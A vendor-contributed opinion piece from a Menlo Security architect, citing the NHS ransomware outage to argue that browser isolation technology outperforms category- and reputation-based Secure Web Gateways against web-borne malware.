Jason Steer, solutions architect - EMEA, Menlo Security
Jason Steer, solutions architect - EMEA, Menlo Security

A perfect storm affecting ICT departments hit home in May as members of the UK National Health Service (NHS) quickly learned about the direct impact of particularly virulent malware: ransomware. Many NHS hospitals and trusts went offline and routine doctor appointments had to be cancelled. Importantly, the situation shows how ICT staff are overwhelmed due to having limited budgets and security approaches that simply do not keep up with Web-borne threats. 

Traditional security systems sound alarms and require human interaction to investigate but staff time is always in short supply. Thus, security administrators, who are also serving as the ICT staff in smaller organisations, find themselves in a no-win situation as they work to implement and enforce web security policies with Secure Web Gateway (SWG) appliances and cloud-based services. 

These security systems were not designed for staff efficiency, and due to their nature, will not catch new malware threats, be it through phishing campaigns or ransomware outbreaks. SWG policies are largely based on website categories, such as news, entertainment, weather, social media, etc and reputation feeds to assess good from bad.

Secure Web Gateways sit between attacks and vulnerable targets, but they can only protect against what they know. These devices rely largely on two data points: site reputation and site category, such as news, entertainment, weather, social media, etc. But what if a site is unknown to the SWG, and does not fall into a known category? There is a gap in security when the device fails to recognise a site or its category.

Administrators can either be lenient in allowing access to these uncategorised sites, consequently increasing malware risk, or deny access to such sites and deprive employees of information and data they need. The threat of contracting malware from the web is not only real, but happens very quickly and will impact employees and critical enterprise systems all at once. 

The web – a big problem 

Today there are more than 500 million malware variants in existence and can even be found on the world's most popular websites, through background sites serving ads. Due to the speed and ease at which it spreads, malware has taken centre stage in most of the high-profile security breaches of 2017. The costs of these breaches is in the hundreds of millions, and thus businesses have been forced to adopt increasingly strict web security policies which rely primarily on traditional Secure Web Gateways legacy architectures. 

An end to the guessing game 

Isolation technology, featuring the use of virtual containers and a rendering technology, eliminates the possibility of malware reaching user devices via compromised or malicious websites and email. This is not detection or classification, rather the user's Web session and all active content (eg, Flash, Javascript etc) whether good or bad, is fully executed and contained in the isolation platform. Only safe, malware-free rendering information is delivered to the user's endpoint. No active content, including Javascript or any potential malware, leaves the platform. Malware has no path to reach an endpoint, so websites and legitimate content needn't be blocked in the interest of security.

Administrators can open more of the Internet to their users while simultaneously eliminating the risk of attacks. With isolation, administrators can safely allow access to uncategorised and any other blocked sites and eliminate the frustrating security versus productivity compromise of the past. 

The benefits of isolation are clear. As no active web content reaches the endpoint, uncategorised sites present zero risk. The cost of sanitising infected machines has always been high. Fortunately, isolation eliminates the web as a malware threat vector, drastically reducing number of machines to be reimaged. And what about those Windows XP systems from ten years ago? Isolation greatly reduces the urgency around patching machines for every browser and plug-in vulnerability, because threats are kept away from these machines. Concerning SOC costs – isolation stops threats before they are detected by traditional solutions, eliminating erroneous or inaccurate malware alerts.  With isolation, the number of trouble tickets decreases as employees are now free to safely explore the web without submitting re-categorisation requests. Lastly, by eliminating re-categorisation requests, the need for expensive experts is eliminated.

The case is clear for transitioning away from a traditional secure gateway approach to a fully new approach leveraging isolation technology in the fight against malware.

Contributed by Jason Steer, solutions architect - EMEA, Menlo Security

*Note: The views expressed in this blog are those of the author and do not necessarily reflect the views of SC Media or Haymarket Media.